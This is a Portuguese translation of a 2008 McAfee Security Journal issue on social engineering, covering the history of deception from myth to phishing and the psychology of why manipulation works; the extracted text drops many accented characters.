MSJ BR

Viso de segurana do McAfee Avert Labs Outubro-Dezembro 2008
ENGENHARIA SOcIAL A principal ameaa de segurana do mundo
CAVALOS DE TRIA, fraude de cliques e cobia por dinheiro so apenas alguns dos vetores que ajudam os criadores de malware a tirar vantagem dos usurios de Internet
McAfee Security Journal Outubro-Dezembro 2008
Sumrio
Editor Dan Sommer Colaboradores Anthony Bettini Hiep Dang Benjamin Edelman Elodie Grandjean Jeff Green Aditya Kapoor Rahul Kashyap Markus Jacobsson Karthik Raman Craig Schmugar Estatsticas Toralv Dirro Shane Keats David Marcus Franois Paget Craig Schmugar Ilustrador Doug Ross Design PAIR Design, LLC Agradecimentos Muitas pessoas ajudaram a criar este exemplar do McAfee Security Journal. Gostaramos de citar alguns dos principais colaboradores: Os executivos seniores da McAfee, Inc. e do McAfee Avert Labs que apoiaram esta criao; nossa junta de revisores Carl Banzhof, Hiep Dang, David Marcus, Craig Schmugar, Anna Stepanov e Joe Telaci; nossos autores e seus gerentes e colegas que os apoiaram com idias e comentrios; os ases do marketing Cari Jaquet, Mary Karlton, Beth Martinez e Jennifer Natwick; os prossionais de relaes pblicas Joris Evers, sua equipe internacional, e a Red Consultancy Ltd.; nossa agncia de design, Pair Design; nossa grca, RR Donnelley; e Derrick Healy e seus colegas em nosso escritrio de localizao em Cork, na Irlanda, que traduziu esta publicao para vrios idiomas. Obrigado a todos; ns no conseguiramos isso sem vocs! Dan Sommer Editor Gostou? Odiou? Envie seus comentrios para Security_Journal@mcafee.com.
As origens da engenharia social Do cavalo de Tria da Odissia ao phishing na Internet: A enganao no acaba. Por Hiep Dang Pea e voc receber A psicologia da engenharia social: Por que isso funciona? Por Karthik Raman Engenharia social 2.0: Qual a prxima A fraude de cliques parece ser uma das ameaas mais provveis que enfrentaremos no futuro prximo. Por Markus Jakobsson As Olimpadas de Pequim: Um alvo preferencial para o malware de engenharia social Os cinco anis e outros grandes eventos so uma atrao irresistvel para os criadores de malware. Por Elodie Grandjean Vulnerabilidades nos mercados de aes Os hackers podem fazer dinheiro com a Patch Tuesday e outras notcias de empresas? Por Anthony Bettini O futuro dos sites de rede social Grandes quantidades de dinheiro e usurios tornam os sites sociais um m para o malware. Por Craig Schmugar A face mutvel das vulnerabilidades Truques de engenharia social podem levar os usurios a falhas no software. Por Rahul Kashyap Typosquatting: Aventuras inadvertidas na navegao A navegao descuidada pela Internet por levar ao inesperado. Por Benjamin Edelman O que aconteceu com o Adware e o Spyware? Leis mais rigorosas podem ter domado o adware, mas os programas potencialmente indesejados (PUP - potentially unwanted program) e os cavalos de Tria continuam. Por Aditya Kapoor Estatsticas: Quo arriscados so os domnios de nvel mais alto? Por David Marcus
9 13
16
22
28
31 34
38
44
Estria do McAfee Security Journal

Por Jeff Green
Bem-vindo ao primeiro exemplar do McAfee Security Journal. Ns o chamamos de primeiro exemplar, mas no estamos realmente produzindo essa publicao pela primeira vez. Ns rebatizamos a nossa revista que, at recentemente, se chamava McAfee Sage. No McAfee Security Journal, voc encontrar a mesma atitude franca, bem como todo o contedo dinmico que se espera dos melhores pesquisadores e autores em segurana de computadores: os especialistas do McAfee Avert Labs. Neste nmero, miramos os mais traioeiros e disseminados de todos os vetores de ameaas: a engenharia social. Tibete livre! Novas imagens da Terceira Guerra Mundial! Segredos da declarao do imposto de renda! Novas tecnologias para economia de combustvel! Remdios baratos on-line! A lista pode continuar, mas achamos que a questo j est clara. Mensagens impressionantes e sedutoras so fundamentais para o sucesso dos criadores de malware e ladres de identidades de hoje, mais do que nunca. Porm, a engenharia social, como mtodo para ludibriar algum, certamente no novidade. Ela existe desde que os seres humanos comearam a se comunicar uns com os outros. Voc tem algo que eu quero. Quero convenc-lo a me dar ou a fazer algo que eu quero que voc faa. A engenharia social , possivelmente, a mais difcil de combater de todas as ameaas devido ao elemento humano. A maneira mais fcil de roubar a identidade de algum pode ser simplesmente pedi-la. As tcnicas de engenharia social (esquemas Ponzi, truques para conquistar conana, esquemas de pirmide, fraude comum, phishing ou spam) seguem todas caminhos semelhantes. Alguns desses ataques so fsicos, enquanto outros so digitais, mas todos tm elementos em comum. Eles tm o mesmo objetivo e, em muitos casos, podem at empregar as mesmas tcnicas. A meta de todos eles manipular as vtimas atravs de um bug no hardware humano. Todos eles criam situaes concebidas para persuadir as vtimas a liberar informaes ou a executar alguma ao. Ns reunimos mais uma equipe notvel de pesquisadores e autores para analisar e ilustrar esse tpico para voc. Ns at inovamos em nossa revista: este nmero marca a primeira vez que temos colaboradores convidados. Comeamos com dois dos melhores: Dr. Markus Jacobsson, do Palo Alto Research Center, e o professor Benjamin Edelman, da Harvard Business School.
Antes de mais nada, um pouco da histria da enganao. Em seguida, analisaremos a psicologia por trs do xito desses ataques. Depois disso, veremos como a engenharia social pode vir a evoluir nos prximos anos. As Olimpadas de 2008 em Pequim terminaram, mas os autores de malware tentaram mais uma vez induzir os acionados por esportes a visitar sites falsos. possvel fazer dinheiro no mercado de aes temporizando eventos como a Patch Tuesday da Microsoft ou notcias de falsicao em empresas? Nossa pesquisa extensiva nos dar uma resposta. Qual a prxima novidade em sites de rede social? A segurana car mais rigorosa ou eles esto condenados a ser alvos fceis devido ao excesso de conana dos usurios? Veremos tambm como os criadores de malware atacam vulnerabilidades de software e tiram proveito do typosquatting a explorao de endereos Web digitados incorretamente. Nosso artigo nal responder a pergunta O que aconteceu com o adware e o spyware? Concluiremos com algumas estatsticas que mostram os graus variados de ameaas a domnios de nvel mais alto no mundo inteiro. Esperamos que voc ache este nmero to estimulante e inspirador quanto ns achamos. Obrigado por se juntar a ns mais uma vez em nossa jornada pelas profundezas da segurana de computadores.
Jeff Green vice-presidente snior do McAfee Avert Labs e de desenvolvimento de produto. Ele mundialmente responsvel por toda a organizao de pesquisa da McAfee, distribuda pelas Amricas, Europa e sia. Green supervisiona equipes de pesquisa voltadas para vrus, ataques dirigidos e de hackers, spyware, spam, phishing, vulnerabilidades e correes e tecnologias de intruso em redes e hosts. Ele tambm lidera pesquisas de segurana de longo prazo para assegurar que a McAfee esteja sempre frente das ameaas emergentes.
OUTUBRO-DEZEMBRO 2008
As origens da engenharia social

Por Hiep Dang
Hoje em dia muito raro um artigo de notcias ou um livro sobre segurana de computadores que no mencione vrias vezes a expresso engenharia social.
Popularizada por Kevin Mitnick (supostamente o mais infame engenheiro social da era da computao moderna), a engenharia social , essencialmente, a arte da persuaso convencer pessoas a divulgar dados condenciais ou a executar alguma ao. Embora engenharia social seja uma expresso contempornea, as tcnicas e losoas por trs dela so to antigas quanto a prpria humanidade. Encontramos relatos de enganao e manipulao nas pginas da histria, do folclore, da mitologia, da religio e da literatura. Zeus, Prometeu roubou o brilho longevisvel do infatigvel fogo em oca frula do Monte Olimpo e o legou aos homens. Como punio por seus atos, Prometeu foi acorrentado a uma rocha, onde todo dia vinha uma guia para lhe comer o fgado, o qual crescia novamente noite. Como punio para os homens, Zeus criou a primeira mulher, Pandora, que trouxe uma caixa e a abriu por curiosidade, liberando inmeras pragas.
Prometeu: O deus da engenharia social?

Segundo a mitologia grega, a atual procincia da humanidade em engenharia social , provavelmente, resultado direto de seu maior mentor: Prometeu, to hbil nessa arte a ponto de enganar Zeus, o rei dos deuses. Em Teogonia e em Os Trabalhos e os Dias, o poeta pico Hesodo conta a histria de Prometeu, um tit conhecido por sua astcia e seus hbeis truques. Credita-se a ele a criao do homem moldado do barro. No que se tornou conhecido como Truque de Mecona, Prometeu ofereceu a Zeus duas escolhas para resolver uma controvrsia entre os deuses e os mortais. Uma oferta foi entranhas de boi recheadas de carne; a outra foi ossos de boi cobertos com alva gordura. Uma era alimento envolto em uma embalagem repulsiva, enquanto a outra no era comestvel, embora fosse visualmente atraente. Zeus escolheu a segunda e, como resultado, a humanidade faria, a partir de ento, sacrifcios apenas de ossos e gordura para os deuses, guardando a carne para si. Colrico por ter sido enganado por Prometeu, Zeus puniu os mortais negando-lhes o fogo. No entanto, em mais um ato de engenharia social contra
O ataque de phishing de Jac e Rebeca

Do Antigo Testamento vem a histria de Jac e sua me, Rebeca, que utilizou uma tcnica de engenharia social que a base dos atuais ataques de phishing: fazer a vtima crer que o "phisher" outra pessoa. Isaac, pai de Jac e esposo de Rebeca, cara cego nos ltimos anos de sua vida. Ao se preparar para a morte, ele disse a seu lho mais velho, Esa, vai ao campo e mata-me uma caa. Prepara-me depois um prato suculento, como sabes que gosto, e traze-mo para que o coma e minha alma te abenoe antes que eu morra. (Gnesis 27:24.) Por preferir que Jac, em vez de Esa, recebesse a bno de Isaac, Rebeca idealizou um plano. Jac foi relutante a princpio, dizendo Mas Esa, meu irmo, peludo, enquanto eu sou de pele lisa. Se meu pai me tocar, passarei aos seus olhos por um embusteiro e atrairei sobre mim uma maldio em lugar de bno. (Gnesis 27:1112.) Para fazer Isaac crer que estava com Esa, Rebeca preparou a refeio de Isaac, vestiu Jac com as melhores roupas de Esa e cobriu as partes lisas do pescoo e das mos de Jac com pele de cabrito. Jac levou a refeio a Isaac, passou no teste de autenticao e obteve a bno que deveria ser dada a Esa.
McAFEE SECURITY JOURNAL
Sanso e Dalila: Espionagem contratada

Sanso era uma gura bblica com uma fora incrvel que lutou contra os listeus. O segredo de sua fora era seu cabelo comprido. Em Gaza, Sanso apaixonou-se por Dalila. Os listeus conseguiram convenc-la a descobrir o segredo da fora de Sanso oferecendo a ela 1.100 moedas de prata. Procura seduzi-lo e v se descobres donde lhe vem sua fora e como o poderemos vencer, a m de o amarrarmos para o dominar. Se zeres isso, dar-te-emos cada um de ns mil e cem moedas de prata. (Juzes 16:5.) Sanso hesitou em contar seu segredo, at que sucumbiu persuaso. Como pode dizer que me amas, se o teu corao no est comigo? disse ela. Eis j trs vezes que me enganas, e no me queres dizer onde reside a tua fora. Finalmente, aps ela insistir e importun-lo dia aps dia, ele cedeu. Ento, ele disse a ela: Sobre minha cabea nunca passou a navalha, porque sou nazareno de Deus desde o seio de minha me. Se me for raspada a cabea, a minha fora me abandonar e serei ento fraco como qualquer homem. (Juzes 16:1517.) Logo aps Sanso adormecer, Dalila exps sua vulnerabilidade raspando o seu cabelo. Enfraquecido, Sanso foi capturado pelos listeus, cegado, acorrentado e aprisionado por toda a vida.
Mseros cidados, que tanta insnia! De volta os Gregos ou de engano exemptos Seus dons julgais? Desconheceis Ulisses? Ou este lenho couto de inimigos, Ou mquina que, armada contra os muros, Vem cimeira espiar e acometer-nos. Teucros, seja o que for, h dano oculto: No bruto no eis. Mesmo em seus brindes. Temo os Danaos.
O mau julgamento dos troianos foi sua runa. Naquela noite, liderados por Ulisses, os soldados gregos escondidos dentro do cavalo mataram os guardas e abriram os portes para o restante do exrcito. Graas engenhosa ttica de engenharia social elaborada por Ulisses, os gregos derrotaram os troianos e venceram a guerra.
O primeiro cavalo de Tria

A histria do cavalo de Tria, notabilizada pelo poeta pico grego Homero na Odissia e pelo poeta pico romano Virglio em Eneida, foi um dos mais inventivos truques de engenharia social da histria da humanidade. Durante a guerra de Tria, os gregos no conseguiam derrubar as muralhas que envolviam a cidade de Tria. O engenhoso guerreiro grego Ulisses elaborou um ardil para fazer os troianos acreditarem que os gregos haviam desistido do cerco cidade. Os gregos levaram sua esquadra de navios para longe e deixaram apenas um grande cavalo de madeira na praia com um nico soldado grego chamado Sinon. Aps ser capturado pelos troianos, Sinon disse-lhes que os gregos haviam deixado o grande cavalo de madeira como uma oferenda aos deuses para garantir sua segurana durante a viagem de volta para casa e que eles o haviam feito grande o suciente para que os troianos no pudessem lev-lo para dentro da cidade, pois isso traria m sorte aos gregos. A histria foi to cativante para os troianos que eles resolveram levar o cavalo de madeira para dentro da cidade murada, apesar das advertncias de Cassandra, que foi amaldioada com a capacidade de prever o futuro sem que ningum jamais lhe acreditasse, e de Laocoonte, um sacerdote troiano que disse em Eneida:
O cavalo de Tria de hoje

Quando Ulisses elaborou seu plano para inltrar Tria, ele no poderia imaginar que estava criando um precedente para milnios depois. O tipo mais predominante de malware encontrado solta atualmente, o cavalo de Tria de silcio, foi assim batizado por Daniel Edwards, da Agncia Nacional de Segurana (NSA) do governo dos Estados Unidos, nos anos 70. Edwards escolheu esse nome inspirado pela tcnica de engenharia social utilizada pelos gregos. Antes dos dias da Internet, os usurios de computadores pessoais compartilhavam arquivos de software atravs de mdia fsica (como disquetes ou unidades de ta) ou conectando-se a sistemas BBS (bulletin board systems). Hackers mal-intencionados logo perceberam que poderiam incitar os usurios a executar cdigos maliciosos simplesmente disfarando-os como um jogo ou utilitrio. Devido simplicidade e incrvel eccia dos cavalos de Tria, os criadores de malware ainda utilizam essa tcnica de engenharia social, dcadas depois. Atualmente, os usurios de PC so induzidos a se infectarem com cavalos de Tria em propores alarmantes. Eles so atrados pelo fascnio de msica, vdeos e software grtis e por cartes eletrnicos (ecards) afetuosos de admiradores secretos.
Crescimento do malware e dos PUPs Famlias distintas dos anos de 1997 a 2007 em milhares
140 130 120 110 100 90 80 70 60 50 40 30 20 10 0 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007
Figura 1: A freqncia do malware e dos programas potencialmente indesejados (PUPs) nos arquivos de assinatura da McAfee teve vrios picos na ltima dcada. Em 1998, os geradores de vrus entraram em cena; de 2003 a 2004, os vrus de emails em massa tornaram-se populares; de 2004 a 2005, as redes de bots estavam em ascenso; e de 2006 a 2007, os cavalos de Tria deslancharam.
Vrus e bots Cavalos de Tria PUPs
Uma trapaa atualizada

A Advanced Fee Fraud (fraude scal avanada), melhor conhecida como fraude nigeriana (fraude 419) est presente h dcadas e ainda um dos tipos mais prolcos de spam. O nmero 419 refere-se seo do cdigo penal nigeriano que prev essa fraude. Essa ttica de engenharia social do tipo que rico rapidamente chegou na forma de uma carta postada pela primeira vez nos anos 70. A trapaa evoluiu para fax no solicitados nos anos80 e, atualmente, quase exclusivamente enviada atravs de email. Suas origens remontam ao sculo XVI, quando era conhecida como Fraude do prisioneiro espanhol. O esquema era simples: Uma vtima ingnua ouvia falar de um prisioneiro espanhol extremamente rico que precisava da ajuda de algum para se libertar. Esse assim chamado prisioneiro contava com o perpetrador da fraude para levantar dinheiro suciente para libert-lo. O perpetrador abordava a vtima com essa histria e permitia que ele ou ela ajudasse com uma parte da arrecadao de fundos, com a promessa de um grande ganho nanceiro. Atualmente existem inmeras variaes da carta, mas o conceito permanece o mesmo. A fraude de email nigeriana ilude suas vtimas com a promessa tentadora de um retorno multimilionrio com um investimento de apenas alguns milhares. Mesmo que a maioria dos destinatrios perceba que a oferta boa demais para ser verdade, estima-se que 1% dos destinatrios ainda responde. De acordo com o Servio Secreto dos EUA, os golpistas conseguem de suas vtimas uma mdia de US$100 milhes por ano com engenharia social.
Relatrios de phishing Em milhares
60 50 40 30 20 10 0
Nov 2003 Maio 2004 Nov 2004 Maio 2005 Nov 2005 Maio 2006 Nov 2006 Maio 2007 Nov 2007
Figura 2: Informes de phishing mostram um crescimento contnuo, mas o nmero de novos sites de phishing aumentou consideravelmente nos dois ltimos anos. (Fonte: Anti-Phishing Working Group)
Relatrios de phishing distintos Novos sites de phishing
Phishing
O termo phishing foi cunhado pelos hackers. Ele derivado de "shing" (pescaria) porque sua tcnica de engenharia social induz suas vtimas (os "peixes") a revelar seus nomes de usurio, senhas, nmeros de cartes de crdito e outras informaes pessoais. Nos anos 90, muitos hackers exploravam as ofertas de uso gratuito de servios de Internet do America Online (AOL) utilizando nmeros de cartes de crdito falsos, gerados automaticamente, que no correspondiam a contas existentes. Aps o AOL aprimorar sua segurana e utilizar testes de validao de cartes de crdito para assegurar que os nmeros dos cartes eram realmente legtimos, os malfeitores comearam a procurar nomes e senhas de usurios reais para entrar nas redes do AOL. Eles comearam a enviar emails e mensagens instantneas falsicadas que pareciam se originar do suporte do AOL. Muitas vtimas incautas forneceram suas informaes e foram subseqentemente cobradas pelas atividades e compras realizadas pelos hackers nas contas comprometidas. Hackers maliciosos logo perceberam a margem de lucro potencial e a taxa de xito de tal ataque e comearam a visar empresas (bancos, eBay, Amazon e outros) que realizavam transaes e comrcio on-line.
Histria da segurana de computadores

Cavalos de Tria comeam a aparecer em BBSs A ARPANET (precursora da Internet) criada O Creeper (o primeiro vrus de computador) lanado na ARPANET John von Neumann publica sua teoria sobre autmatos auto-reproduzveis A Internet formada a partir da ARPANET O spam (email no solicitado) aparece logo aps a Internet ser disponibilizada ao pblico O Dr. Frederick Cohen publica Experiments with Computer Virus (Experimentos com vrus de computador) e credita a Leonard Adleman a expresso vrus de computador O McAfee Avert Labs torna-se a primeira equipe global de resposta a emergncias antivrus O primeiro ataque de phishing realizado para roubar senhas de usurios do AOL Atualmente, o McAfee Avert Labs protege os clientes contra vrus, worms, cavalos de Tria, spyware, PUPs, vulnerabilidades, spam, phishing, domnios maliciosos, intruses em redes e intruses em hosts
1948
1965
1969
1971
1978 1980 1982 1983 1984 1986 1988
1995 1996
2000 2002
2008
O Elk Cloner (o primeiro vrus de Apple) lanado O correio eletrnico (email) criado O primeiro BBS (Bulletin Board System) pblico estabelecido John Draper (tambm conhecido como Capn Crunch) descobre que o apito de brinquedo fornecido como brinde em caixas de cereal pode ser utilizado em phreaking (hacking de telefonia)
O Morris Worm (o primeiro worm auto-replicante) lanado O Brain (o primeiro vrus de PC) lanado
Kevin Mitnick publica The Art of Deception (A arte de enganar), descrevendo seu domnio da engenharia social O spyware e o adware comeam a se tornar corriqueiros
O filme War Games (Jogos de guerra) dramatiza as conseqncias do hacking
Figura 3: Linha cronolgica de eventos signicativos de engenharia social.
A histria repete-se
Seja denominado engenharia social, enganao, truques para conquistar conana, propenso cognitiva ou fraude, o conceito de explorar a ingenuidade e a conana de uma pessoa predominante desde o incio dos tempos at hoje. Pergunte aos especialistas em segurana e eles concordaro que as pessoas so o elo mais fraco na corrente da segurana. Podemos desenvolver o software mais seguro para proteger nossos computadores, implementar as polticas de segurana mais restritivas e promover uma educao utpica do usurio. No entanto, enquanto continuarmos a ser movidos pela curiosidade e pela ganncia, a despeito das conseqncias, viveremos nossa prpria verso de uma tragdia troiana. O progresso, longe de consistir em mudana, depende da capacidade de reteno. Quando a mudana absoluta, no permanece coisa alguma a ser melhorada e nenhuma direo estabelecida para um possvel aperfeioamento: e quando a experincia no retida, como acontece entre os selvagens, a infncia perptua. Aqueles que no conseguem lembrar o passado esto condenados a repeti-lo. George Santayana, em Razo no senso comum, de A Vida da Razo.
obras citadas
Anderson, J. P. (1972). Computer Security Technology Planning Study vol. II. Homero. A Ilada. (Traduo livre) Mitnick, K. (2002). A Arte de Enganar. Indianapolis, Indiana: Wiley Publishing. Myers, M. J. (2007). Phishing and Countermeasures (Phishing e contramedidas).
Hiep Dang diretor de pesquisa antimalware do McAfee Avert Labs. Ele responsvel pela coordenao da equipe global de pesquisadores de malware da McAfee dedicados pesquisa, anlise e resposta a epidemias de malware, incluindo vrus, worms, cavalos de Tria, bots e spyware. Dang colaborador regular dos blogs e artigos do Avert Labs e escreve para o McAfee Security Journal. Ele foi entrevistado por Wall Street Journal, MSNBC, PC Magazine e muitas outras publicaes e veculos de mdia sobre novas ameaas e tendncias de malware. Dang tambm um devotado praticante de Wah Lum Tam Tui Northern Praying Mantis Kung Fu e Tai Chi. Ele atualmente est fazendo uma pausa em seu treinamento vitalcio para se concentrar na indstria de segurana de computadores.
(Estudo de planejamento em tecnologia da segurana de computadores vol. II). Fora Area dos EUA. Farquhar, M. (2005). A Treasury of Deception (Um tesouro da enganao). New York: The Penguin Group. Hesodo (1914). Teogonia. (Traduo livre) Hesodo (1914). Os trabalhos e os dias. (Traduo livre)
John Wiley & Sons, Inc.

Santayana, G. (1905). A Vida da Razo. Virglio (19 a.C.). A Eneida. (Traduo livre)
Pea e voc receber

Por Karthik Raman
Em janeiro de 2007, cibercriminosos utilizaram tticas de engenharia social para realizar o maior roubo on-line j registrado, subtraindo US$1,1 milho de clientes do banco sueco Nordea Bank.
Os clientes receberam um email que parecia ter sido enviado pelo Nordea Bank e 250 deles zeram download e instalaram o software anti-spam que o email lhes pedia para congurar. O software anti-spam era, na realidade, um cavalo de Tria que coletava informaes dos clientes, as quais os criminosos utilizavam para efetuar login no site do banco e roubar dinheiro.1 Um conhecido princpio de segurana da informao diz que, em qualquer sistema de segurana, as pessoas so o elo mais fraco. Embora os ataques segurana e as defesas desenvolvidas para reagir a esses ataques continuem a evoluir, a natureza humana permanece inalterada. Para um atacante, a engenharia social mais eciente e traz retornos mais rpidos do que investidas de fora bruta contra algoritmos de criptograa, fuzzing para descobrir novas vulnerabilidades de software ou aumento de complexidade do malware. Na fraude do Nordea Bank, foi mais fcil para os criminosos pedirem aos clientes do banco que instalassem um cavalo de Tria do que arrombar um cofre para roubar dinheiro em espcie. Somos crdulos, gananciosos e curiosos, o que signica que os engenheiros sociais podem manipular nossos pensamentos e emoes. Eles nos pedem algo e, com freqncia, recebem o que pedem. Mas por que ns agimos assim? No trabalho pioneiro da psicologia da segurana, o renomado especialista em segurana Bruce Schneier identicou quatro reas de pesquisa economia comportamental, psicologia da tomada de decises, psicologia do risco e neurocincia que ajudam a explicar porque nossa sensao de segurana diverge da realidade.2 Esta edio do McAfee Security Journal e este artigo em particular enfocam um nico aspecto da segurana: a engenharia social. Nesta discusso, recorreremos neurocincia, psicologia da tomada de decises e psicologia social elementar para analisar porque as pessoas caem na engenharia social sem perceber o logro.
Uma histria de dois crebros

O crebro humano , supostamente, o sistema mais complexo do universo. Parte dessa complexidade reside em sua organizao complicada e na interao intrincada de subsistemas. No crebro, as emoes parecem emanar das partes mais antigas e internas, como a amgdala, e a razo de partes mais recentes e externas, como o neurocrtex.3 No entanto, as bases da emoo e da razo no se excluem mutuamente, como observou Isaac Asimov em seu livro O Crebro Humano:4 Ao que parece, as emoes no emanam de uma nica pequena parte do crebro. Em vez disso, esto envolvidas muitas partes, incluindo os lobos frontal e temporal do crtex em uma interao complexa. As partes do crebro responsveis pela emoo e pela razo podem, ocasionalmente, trabalhar a favor ou contra umas as outras. Por isso to difcil para ns manter separadas a razo e a emoo e por isso to fcil a emoo prevalecer sobre a razo quando ambas se contradizem. Vejamos como ns lidamos com o medo, por exemplo. Aoexaminar a forma como reagimos a um perigo iminente, oescritor cientco Steven Johnson ressalta que a resposta ao medo uma combinao orquestrada de instrumentos siolgicos desencadeada com velocidade e preciso fantsticas:5 Chamamos isso, coloquialmente, de resposta lutar ou fugir. Experimentar esse processo uma das melhores maneiras de perceber nossa mente e nosso corpo como um sistema autnomo, operando de maneira independente de nossa vontade consciente.
Quando se repetem as condies que levaram a uma resposta lutar ou fugir no passado, ns permitimos que a resposta emocional assuma o controle, muito embora percebamos objetivamente que a resposta no tem razo de ser. Polticos desonestos, espies e vigaristas sabem que apelar emoo especialmente ao medo para despertar uma resposta emocional um meio bastante ecaz para atingir seus objetivos. Os engenheiros sociais continuam essa tradio.
Teorias da engenharia social

Manipulao de emoes
Muitos engenheiros sociais miram as emoes do medo, curiosidade, ganncia e simpatia. fato notrio que estas so emoes universais; ocasionalmente todos sentem medo, curiosidade, ganncia ou simpatia. O medo e a curiosidade so teis em muitas situaes. Escapar de um prdio em chamas algo bom. A curiosidade pode nos ajudar a superar a ns mesmos e a aprender algo novo. Mesmo assim, ao agir por puro medo ou curiosidade, podemos fazer coisas perigosas ou indesejveis.6 Alguns ataques podem ser realizados at mesmo sem a presena do engenheiro social, manipulando-se a curiosidade da vtima. Em abril de 2007, um cavalo de Tria bancrio plantado em unidades USB foi deixado em um estacionamento de Londres. Pessoas curiosas em saber o que essas unidades continham e provavelmente satisfeitas em se tornarem proprietrias de um dispositivo de armazenamento gratuito, conectavam as unidades em seus computadores e os infectavam com malware.7 Atacantes que ameaam ou chantageiam as vtimas manipulam seu medo. O cavalo de Tria GPCoder.i, que apareceu em junho de 2008, um exemplo de malware que manipulava o medo: ele criptografava os arquivos dos usurios e exigia um resgate para sua decodicao.8 De maneira semelhante, atacantes que subornam as vtimas manipulam sua ganncia e atacantes que se fazem passar por necessitados manipulam sua simpatia.
Polticos desonestos, espies e vigaristas sabem que apelar emoo especialmente ao medo para despertar uma resposta emocional um meio bastante ecaz para atingir seus objetivos. Os engenheiros sociais continuam essa tradio.
a capacidade para isso. Em vez disso, precisamos, com muita freqncia, utilizar nossos esteretipos, nossas regras prticas, para classicar as coisas de acordo com algumas caractersticaschave e, em seguida, responder de forma impensada quando um ou outro desses gatilhos estiver presente. Vejamos como os engenheiros sociais podem despertar em ns respostas automticas que sirvam para eles.
Despertar propenses cognitivas

Uma propenso cognitiva um erro mental causado por uma estratgia simplicada de processamento de informaes.10 Quando uma heurstica falha, ela se torna uma propenso. Os engenheiros sociais cutucam nossa heurstica, transformando-a em erros graves e sistemticos.11 Aqui esto algumas propenses cognitivas que podem explicar a engenharia social:
Propenso a uma escolha As pessoas lembram de uma opo que tenham feito no passado como tendo mais aspectos positivos do que negativos.12 Um comprador on-line pode car acostumado a comprar itens em promoo na Internet utilizando indicaes de amigos. Um email de spam ocasional pode parecer uma indicao e levar o comprador a fornecer informaes de carto de crdito a um site fraudulento. Propenso conrmao As pessoas coletam e interpretam evidncias de uma maneira que conrma seus pontos de vista.13 Vejamos um exemplo hipottico. Suponha que a Acme Corporation contrate a Best Printers para fazer a manuteno de suas impressoras e que o pessoal de manuteno da Best Printers use camisas cinza de manga longa e crachs. Com o tempo, os funcionrios da Acme acostumam-se a ver funcionrios da Best Printers com seus uniformes e identicam qualquer um que esteja usando uma camisa cinza de manga comprida e um crach como um funcionrio encarregado. Um engenheiro social pode fabricar ou roubar um uniforme da Best Printers para se passar por um funcionrio da manuteno. O engenheiro social pode no ser solicitado a se identicar devido propenso conrmao dos funcionrios da Acme.
Atalhos mentais indevidos

s vezes os engenheiros sociais apelam para algo alm de nossas emoes. Eles tentam pr em ao nossas regras mentais para processamento de informaes. Chamamos a essas regras de heurstica ou de regras prticas. Embora devamos reconhecer que nossa heurstica falvel, no podemos funcionar sem ela. Nossas vidas seriam difceis demais se tivssemos de pensar em tudo o que percebemos, dizemos e fazemos. Ns precisamos desesperadamente de nossos atalhos mentais. O psiclogo Robert Cialdini explica essa necessidade:9 No se pode esperar que reconheamos e analisemos todos os aspectos de cada pessoa, evento e situao que encontramos, mesmo em um nico dia. No temos o tempo, a energia ou
10
Efeito exposio As pessoas gostam de coisas (e de outras pessoas) de acordo com o quanto estas so conhecidas.14 Notcias de desastres naturais e provocados pelo homem costumam proliferar em sites de phishing que exploram esse sentimento.15 As pessoas expostas a tais notcias podem ser facilmente atradas a visitar sites de phishing que alegam ter alguma relao com as notcias. Finalmente, a exposio das pessoas s notcias pode t-las feito abaixar a guarda em relao natureza maliciosa do site visitado. Ancoragem As pessoas se concentram nas caractersticas identicadoras mais aparentes quando tomam decises sobre alguma coisa.16 Um site bancrio falsicado que mostre com destaque o logotipo real do banco pode enganar os usurios, mesmo que outros indicadores de segurana denunciem de forma gritante a fraude.17
Efeito de salincia Dado um grupo de indivduos, as pessoas acham que a pessoa mais inuente ou menos inuente a que mais se destaca.20 Os engenheiros sociais so especialistas em se adaptar ao meio e a se misturar na multido. Eles se empenham em inverter o efeito de salincia a seu favor. Eles podem se apresentar como um cliente de palet e gravata ou como um zelador de macaco, mas nunca como um saltimbanco em pernas de pau. Perder-se na multido no se limita a roupas e aparncia pode incluir o conhecimento de jarges da empresa, eventos, funcionrios e at sotaques regionais. Um engenheiro social do Rio tentando invadir uma empresa de So Paulo pode saber do novo beb da Joana e que o Joo est saindo da empresa para trabalhar no concorrente e pode comentar isso com o recepcionista, com um sotaque paulista, e ter acesso ao escritrio para reparos de TI. Concordncia, conformidade e obedincia As pessoas reagem s presses por concordncia, conformidade e obedincia mudando seu comportamento. Muitos ataques de engenharia social podem ser explicados pelas respostas previsveis das vtimas a essas presses. Uma engenheira social pode se passar por uma executiva visitante e convencer um segurana jovem a deix-la entrar no local, apesar de no estar usando um crach. (Uma promessa de recompensa ou ameaa de punio feita pela atacante pode pressionar ainda mais o segurana.) O segurana pode se sentir intimidado e obedecer. Ataques de engenharia social em grupo ainda no foram observados, mas so concebveis. Vrios engenheiros sociais podem se passar por funcionrios legtimos e pressionar o recepcionista para obter acesso a um escritrio repetindo No nos faa perder tempo ou Temos mais o que fazer. O recepcionista pode deix-los entrar apenas para no contrari-los. Uma tcnica diferente que os espies costumam utilizar confraternizar com a vtima por algum tempo. O atacante comea fazendo perguntas incuas vtima e, em seguida, passa para informaes condenciais. A vtima cai na armadilha, sentindo-se compelida a concordar com as prximas exigncias devido ao seu perl de condescendncia ou se arrisca a ser chantageada de alguma forma.
Erros causais em esquemas

Os psiclogos sociais denem um esquema como a imagem de realidade com a qual nos relacionamos para que possamos tirar concluses sobre nosso ambiente. Quando somos crianas, aprendemos que ser bons com os outros uma coisa louvvel. O notrio engenheiro social Kevin Mitnick observou que os atacantes sabem disso e elaboram um apelo s vtimas que soe to razovel que no levante suspeita, enquanto exploram a conana da vtima.18 Portanto, os engenheiros sociais aproveitam-se da natureza de nosso esquema social. Aqui est uma lista de julgamentos ou erros sociais comuns cometidos pelas pessoas, com exemplos de como os engenheiros sociais os exploram:
Erro de atribuio fundamental As pessoas supem que o comportamento dos outros reete caractersticas internas e estveis.19 Esse o erro das primeiras impresses enganosas. O engenheiro social treina de forma diligente para causar uma primeira impresso favorvel. Os atacantes podem agir de forma agradvel ao fazer apelos ou agir de forma dominadora ao coagir as vtimas a fazer algo. As vtimas podem no perceber que seus interlocutores so atores e que seu comportamento situacional um meio para se atingir um m.
11
Concluso
